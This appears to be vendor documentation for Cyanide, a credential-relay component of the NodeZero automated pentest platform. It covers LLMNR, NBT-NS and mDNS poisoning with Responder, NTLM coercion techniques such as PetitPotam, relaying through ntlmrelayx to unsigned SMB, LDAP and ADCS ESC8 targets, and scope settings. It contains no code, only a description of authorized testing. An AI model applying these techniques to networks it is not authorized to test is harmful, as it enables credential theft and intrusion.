Skip to content

Cyanide

Cyanide is H3's tool to facilitate and correlate man-in-the-middle (MITM) attacks and credential relays.

Cyanide utilizes opportunistic network protocol poisoning techniques and active coercion techniques to solicit a device to connect to NodeZero with authentication material. If MITM relay has been enabled for the pentest, Cyanide will attempt to relay authentication material to vulnerable target services and applications within the scope of the pentest.

Terminology

MITM Credential Relay attacks typically involve two hosts within the target network. H3 uses the terms "Source" and "Target" to differentiate these two hosts and their associated weaknesses and misconfigurations that enable a successful MITM attack.

  • Source - The host/user that initiates a connection and authentication session to NodeZero's relay server. Typically, the source authentication material will provide a username and possibly the path to a requested resource (e.g SMB share, SQL database, etc.)
    • Source Weakness - the poisoning or coercion weakness that enabled or caused the source host to connect to NodeZero's relay server.
  • Target - The host to which NodeZero will relay the authentication material for exploitation.
    • Target Weakness - the Weakness on the target host that enables cyanide to relay credentials successfully and gain unauthorized access.

Purpose

During a pentest, NodeZero has to be able to accurately correlate the source of discovered credentials and track where they are being utilized to access network resources. Additionally, NodeZero needs to accurately determine which weaknesses were utilized in an attack chain. Cyanide's primary purpose is to make these correlations for MITM attacks, and capture authentication material for use or hash-cracking. Cyanide answers the questions:

  • Who
    • The user, machine or service account the captured authentication material represents.
  • What
    • The attack method used to cause the source host/user to connect to NodeZero:
      • Poisoning (LLMNR, NBT-NS, MDNS)
      • Coercion (PetitPotam, ShadowCoerce, PrinterBug, etc.)
    • The resource requested by the source user (e.g SMB share, SQL database, etc.)
  • Where
    • The source host of the authentication material (i.e. Where the connection came from).
    • Where were the credentials utilized (i.e. the target service/host of the relay attack).
  • When
    • The date/timestamp of each event will be available:
      • When the host was poisoned
      • When the hash was captured
      • When a relay attack happened
  • Why
    • With the combined data, Cyanide can tell why this attack happened and why it was successful.

System Breakdown

Currently the Cyanide system consists of 4 distinct parts:

  1. Cyanide Message Pump
    • Responsible for correlating source and target information and providing collected data to NodeZero
  2. Responder
    • Responsible for broadcast protocol poisoning
  3. Intimidator
    • Responsible for coercion attacks
  4. Impacket's ntlmrelayx
    • Responsible for handling inbound SMB and HTTP connections and relaying authentication material to vulnerable targets

The Cyanide Message Pump

The main cyanide process, or message pump, processes incoming messages from the other 3 components of the Cyanide system and takes appropriate action correlating source and target information and populating a database that NodeZero can utilize to understand what MITM interactions are occurring and what new authentication material is available for the pentest.

Responder

Responder is an LLMNR, NBT-NS, and MDNS poisoner. It will answer specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: Archived Microsoft KB). By default, the tool will only answer File Server Service requests, which is for SMB.

If Responder poisons a source host via one of these broadcast protocols, it will reach back via whatever protocol the broadcast was for (e.g. SMB, RDP, MSSQL, etc.).

  • If the protocol is NOT SMB or HTTP, Responder will simply capture the credential and inform Cyanide of the results. Cyanide will then report this data back to NodeZero's ephemeral cloud architecture and attempt to re-use or crack the captured credential material.
  • If the protocol IS SMB or HTTP, ntlmrelayx SMB and HTTP servers will handle it appropriately - either relaying it to a vulnerable service or dumping the credential for cracking.

  • Poisoners

    • LLMNR
      • LLMNR stands for Link-Local Multicast Name Resolution. LLMNR is based on the DNS format and enables computers on the same local network to conduct name resolution of other hosts. LLMNR is unicast, so only the device that sent the request will see the reply.
      • Server port UDP/5355
    • NBTNS
      • NBT-NS stands for Network Basic Input/Output System Name Service. NBT-NS is often referred to as its base application programming interface, NetBIOS, for short. The NBT-NS protocol is used similarly to LLMNR, except it utilizes hosts on the network by their NetBIOS name and will ask the receiving machine to disclose and return its current set of NetBIOS names. NBT-NS can utilize broadcast, unicast, or multicast.
      • UDP/137
      • UDP/138
    • MDNS
      • mDNS stands for Multicast Domain Naming System (mDNS). mDNS replies are sent over multicast so that everyone can see them and keep their local mDNS cache up to date.
      • UDP/5353
    • Servers
      • MSSQL
        • TCP/1433
        • UDP/1434
      • RDP
        • TCP/3389
      • Kerberos
        • TCP/88
      • FTP
        • TCP/21
      • POP
        • TCP/110
      • SMTP
        • TCP/25
        • TCP/587
      • IMAP
        • TCP/143
      • HTTPS
        • TCP/443
      • LDAP
        • TCP/389
        • UDP/389
      • DCERPC
        • TCP/135
      • WINRM
        • TCP/5895

Expanded vs. Limited Poisoning

NodeZero's Attack Configuration options have 2 options that control the behavior of Responder:

  • Expanded LLMNR and NetBIOS poisoning
    • Responder will sniff all available traffic regardless of scope.
    • In "Expanded" mode, relay sources from outside the pentest's configured scope will NOT be targeted for any other attacks; they are only used to capture/relay credential material.
  • Limited LLMNR and NetBIOS poisoning
    • Responder is limited to the scope provided during the configuration of the pentest. If both options are selected, the Limited option will override the Expanded option.

Where does it work?

Since Responder works by capturing broadcast and multicast packets, capturing requests in different networks is not possible and therefore, Cyanide will only work within NodeZero's subnet.

Intimidator

Intimidator is H3's framework for integrating NTLM coercion techniques with Cyanide. Intimidator provides a quick plug-and-play capability to facilitate the inclusion of new coercion techniques and open source tools quickly into NodeZero. Cyanide communicates with Intimidator over a duplexed IPC -- allowing the two processes to coordinate coercion and relay attacks effectively.

Impacket's NTLMRelayx

Cyanide utilize's a modified version of Impacket's NTLMRelayx as the base for our relay server.

When a source host connects and provides authentication material to ntlmrelayx's SMB or HTTP server, it will save the NTLMv2 hash for cracking and relay the authentication session to high-value service vulnerable to NTLM relay within the scope of the pentest. Possible targets include: - SMB servers with SMB-signing disabled: If cyanide is able to successfully log into the server, it will attempt to dump local credentials. - ADCS Server with the ESC8 Misconfiguration - LDAP servers with LDAP Signing disabled.

Scoping Scenarios

The below Scenarios and Examples review cyanide's behavior when the "Limited LLMNR and NetBIOS poisoning option is configured for the pentest.

Scenario 1

No scope is specified OR if the scope of the NodeZero host subnet is specified Scope defaults to the full subnet of the NodeZero host to poison

Example 1

NodeZero host subnet: 192.168.0.0/24
Scope: Auto-Expand
Result: Cyanide will get a scope of 192.168.0.0/24 because no scope was specified and poisoning can only happen within the network of NodeZero. Relaying will occur against high-value targets that are discovered. Coercion attempts will be made against high-value targets within the pentest scope.

Example 2

NodeZero host subnet: 192.168.0.0/24
Scope: 172.16.100.0/24, 10.0.0.0/16, 192.168.0.0/24
Result: Cyanide will get a scope of 192.168.0.0/24 because the specified scope contains the subnet of the NodeZero host. Relaying and coercion will occur against high-value targets that are within the scope specified.

Scenario 2

The scope of the NodeZero host is within the whitelist, Cyanide will get that as its scope

Example

NodeZero host subnet: 192.168.0.0/24
Scope: 172.16.100.0/24, 10.0.0.0/16, **192.168.0.0/30**
Result: Cyanide will only poison hosts within the 192.168.0.0/30 subnet because it falls within the NodeZero hosts subnet. Relaying and coercion will occur against high-value targets that are within the scope specified.